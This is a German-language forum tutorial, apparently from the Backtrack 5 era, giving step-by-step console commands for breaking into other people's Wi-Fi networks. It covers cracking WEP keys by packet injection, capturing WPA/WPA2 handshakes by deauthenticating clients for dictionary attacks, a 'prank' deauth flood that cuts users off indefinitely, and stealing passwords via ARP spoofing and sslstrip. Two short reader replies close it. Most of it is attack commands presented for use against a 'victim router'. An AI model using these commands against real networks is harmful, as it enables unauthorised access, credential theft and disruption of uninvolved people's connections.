Aufwand: 3/10
Bustrate: 0,5/10
1. Wardriving
1.1 WLAN hacken/entschlüsseln
1.1.1 WEP hacken
1.1.2 WPA/WPA2 hacken
2.1 WLAN sniffen

1. Wardriving
Viele Haushälte in Deutschland besitzen Wireless-LAN. Was viele nicht wissen, ist die Tatsache, dass

unverschlüsseltes WLAN extrem angreifbar und somit unsicher ist. Daher nutzen die meisten eine

Verschlüsselung des WLANs, um die Sicherheit des Datenverkehrs zu gewährleisten. Dadurch denken sie

geschützt zu sein. Das stimmt solange sie eine WPA2 AES CCMP PSK-Verschlüsselung haben. Denn selbst

bei der WPA-TKIP-Verschlüsselung entdeckte man Sicherheitslücken. Sehr unsicher, aber leider noch

weit verbreitet, ist die WEP-Verschlüsselung. Viele fanden Möglichkeiten diese WEP-VErschlüsselung

und damit das WLAN-Passwort, in wenigen Minuten herauszufinden. Wie einfach das ist und wie

erschreckend, demonstriere ich in diesem Tutorial.

1.1 WLAN hacken/entschlüsseln
Benötigt wird:
- eine kompatible WLAN-Karte/Stick
- Backtrack 4 oder 5
- eine Brain.exe
- VirtualMachine oder CD oder USB-Stick

Ihr installiert einfach Backtrack auf einer VM, für VMWare gibt es sogar schon vorinstallierte

Versionen oder auf eine CD und startet sie dann wie eine LiveCD oder auf einen USB-Stick, dafür

benutzt ihr am besten den LiliLiveUSBCreator, der installiert automatisch Backtrack auf einen USB

Stick. Es wird so ziemlich jede Karte unterstützt. Eine Liste, welche Karten unterstützt werden gibt

es hier:
http://www.aircrack-ng.org/doku.php?...bility_drivers

Ich würde euch aber empfehlen, einen vernünftigen neuen WLAN USB Stick kaufen, falls ihr noch keinen

Guten habt. Ich nutze z.B. den Alfa AWUS036NEH 1000mW. Eure Karte sollte den Monitor Mode und die

Injection unterstützen. Wenn ihr das alles habt, kann es ja losgehen.

1.1.1 WEP hacken
Es gibt in Backtrack 5 schon eine GUI Version des Arircrack-ng zum WLAN hacken, aber ich erkläre

euch, wie man das über die Konsole macht.
Zuerst muss eure WLAN Karte/Stick in den Monitor Mode (passiven Scan-Mode) versetzt werden, um WLAN

und Data-Packete abzufangen, die bei der Passwortentschlüsselung benötigt werden.
Mit dem Befehl:
Code:

airmon-ng

lassen sich alle mit Backtrack kompatiblen WLAN-Karten anzeigen. Um diese Karte jetzt in den Monitor

Mode zu bringen, müsst ihr euch das Interface von der Karte merken, z.B.: wlan0, ath0, wifi0, ra0...
und schreibt folgendes:
Code:

airmon-ng start wlan0

wlan0 ist jetzt mein Beispielinterface. Wenn der Befehl ausgeführt wurde und unten in Klammern:
Code:

(enabled Monitor Mode on mon0)

steht, dann ist euer neues Interface mon0, ansonsten bleibt es so.

Jetzt ist es an der Zeit, die Gegend nach WLANs abzusuchen. Uns interessieren jetzt erst einmal nur

WEP-verschlüsselte WLANs. Zum Scannen der Gegend, gebt den Befehl ein:
Code:

airodump-ng mon0

Wartet ein paar Sekunden, bis alle Channel abgesucht wurden und stoppt dann den Befehl mit Strg-C.
(Ctrl-C). Jetzt wählt euer WLAN aus und stellt sicher, dass es WEP-verschlüsselt ist. Jetzt notiert

Channel (1-12(13)), BSSID und ESSID. Mein Beispiel ist jetzt:
Code:

Channel: 6; BSSID: 00:11:22:33:44:55; ENCRYPTION: WEP; ESSID: WLAN

Dann schreibt:
Code:

airodump-ng -c 6 --bssid 00:11:22:33:44:55 --ivs -w out mon0

Die 6 ist jetzt mein Beispielchannel, nach --bssid kommt also eure BSSID und --ivs -w out heißt,

dass alle Data-Packete in einer Datei namens out.ivs gespeichert wird.
Während der jetzt Packete sammelt, achtet besonders audf die Datas, sie müssten relativ langsam

ansteigen, so max. 1 Packet pro Sek., außer jemand surft gerade in dem WLAN, dann sollten es um die

30 pro Sek. sein. Alle die mit einem WLAN verbunden sind, sieht man unten aufgelistet bei STATIONs.

Zum Knacken benötigt ihr ungefähr 60000 Packete, mal mehr, mal weniger. Um jetzt schnell auf diese

Menge zu kommen, müsst ihr Packete in den Router injecten, damit er mehr raussendet. Ihr benötigt

also einen ARP-Request(Handshake). Dazu öffnet ihr einen neuen Tab im Terminal und schreibt

folgendes:
Code:

aireplay-ng -1 100 -a 00:11:22:33:44:55 -e WLAN mon0

Jetzt wird eurem Victimrouter vorgegaukelt, dass ihr ein ganz normaler Mitnutzer des WLANs seit und

das Passwort wüsstet (Fake Authorisation). Dann öffnet ihr einen neuen Tab und schreibt:
Code:

aireplay-ng -3 -b 00:11:22:33:44:55 mon0

Jetzt werden ARP und ACK-Packete gesammelt und injectet. Wenn nach 1 Minute Laufzeit die Packete

nicht massig in die Höhe steigen, dann basteln wir unser eigenes ARP-Packet, um es zu injecten. Das

geht bei 90% der Router, besonders gut bei T-Com Routern. Der Befehl:
Code:

aireplay-ng -5 -b 00:11:22:33:44:55 -h 00:12:34:56:78:9A mon0

muss in einem neuen Tab ausgeführt werden und nach -h kommt eure eigene MAC-Adresse der WLAN-Karte

oder eine Fake-MAC, merkt euch aber, dass nur 40% der Karten eine gefakte akzeptieren, per iwconfig

wlan0 könntet ihr eure MAC-Adresse rausfinden.
Wenn der Befehl ausgeführt wurde, drückt ihr auf y und wenn der Befehl nicht hilft, dann seid ihr zu

weit vom Router entfernt.
Wenn ihr meint, dass ihr genug Packete inzwischen habt, dann öffnet einen neuen Tab und schreibt:
Code:

aircrack-ng -b 00:11:22:33:44:55 out-0*.ivs

Jetzt berechnet er das Passwort aus den Informationen der Packete, wenn er mehr braucht, dann steht

da: failed, next try with blablabla IVs.
Nach ein paar Minuten maximal habt ihr dann das Passwort da stehen. Entweder so:
[3A:4B:33:AA:C9:01], dann heißt das Passwort: 3A4B33AAC901 oder so:
[3A:4B:33:AA:C9:01] (Ascii: arschbalbla), dann heit euer Passwort natürlich das, was bei Ascii

steht.
Nun könnt ihr alle anderen Befehle mit Strg-C (Ctrl-C) beenden.

Wenn bei euch in airodump ein Client, also bei STATION sich mit eurem Victimrouter verbunden hat,

dann tippt nach dem aireplay-ng -3 Befehl:
Code:

aireplay-ng -0 10 -a 00:11:22:33:44:55 -c 99:88:77:66:55:44 mon0

Nach -c kommt BSSID(MAC-Adresse) der Client-WLAN-Karte. Das trennt den Router vom Client und der

Client muss sich neu verbinden. Beim Neuverbinden sendet der Router ARP-Requests, die ihr benötigt.

Scherzbefehle:
Code:

aireplay-ng -0 10000000000 -a 00:11:22:33:44:55 -c 99:88:77:66:55:44 mon0

Mit dem Befehl trennt ihr ohne das Passwort zu kennen den Router vom Client für etwa 30000000000

Sekunden, wenn ihr den PC solange laufen lasst. Es sendet so eine Art Störsignal. DAs funktioniert

auch bei WPA2 und WPA-verschlüsselten WLANs.

1.1.2 WPA/WPA2 hacken
Es ist eigentlich dasselbe Prinzip, nur, dass bei WPA/WPA2 nichts injected werden kann und wir die

BruteForce-Methode anwenden müssen. Die Sicherheit des WLANs liegt also im Passwort.
Ihr benötigt eine Dictionary-File, eine gute habe ich mal rausgesucht:
http://www.renderlab.net/projects/WPA-tables/
Nun, dann kann es ja losgehen.
Ihr macht einfach dasgleiche wie oben, abscannen und notieren. wichtig hierbei ist nur, dass ihr

einen Client benötigt, ohne den geht es nicht...
Wenn einer das ist, dann macht folgendes:
Code:

airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w out

Jetzt müsst ihr den Router vom Client trennen, um einen Handshake zu bekommen:
Code:

aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 99:88:77:66:55:44 mon0

Wenn der Befehl nicht innerhalb 20 Sekunden funktioniert und bei airodump oben rechts nicht

Handshake steht, dann probiert den Befehl mehrmals aus bzw. kalibriert die Anzahl der DeAuth-

Packete, in dem Beispiel ist es die Zahl 5.
Wenn das erldigt ist, startet ihr aircarck (die Datas interessieren euch ziesmal nicht):
Code:

aircrack-ng -a 2 -b 00:11:22:33:44:55 -e WLAN -w passwordlist out-0*.cap

Jetzt testet aircrack alle Passwörter in der Liste durch und vielleicht habt ihr ja Glück

2.1 WLAN sniffen
Als letztes möchte ich euch zeigen, wie ihr ein wenig rumsniffen könnt und somit Passwörter

abgreift. Ich benutze dazu Backtrack 5.
Ihr verbindet euch in Backtrack mit Wicd mit dem WLAN eurer Wahl und führt im Terminal folgende

Befehle aus:
Code:

netstat -nr

Dieser Befehl zeigt die im Netzwerk aktiven Clients an. Wählt einen aus und merkt euch die IP.
192.168.2.100 ist jetzt meine Beispiel-IP.
Code:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
echo '1' > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 192.168.2.100

Dann öffnet ihr einen neuen Tab und schreibt am Ende:
Code:

sslstrip -l 8080

So jetzt einfach warten und wenn jemand ein Passwort eingibt, müsste es bei sslstrip unten erscheinen plus Internetseite und Username.

danke gucken ob es funkt

wo ist der "Gefällt Mir"-Button? ^^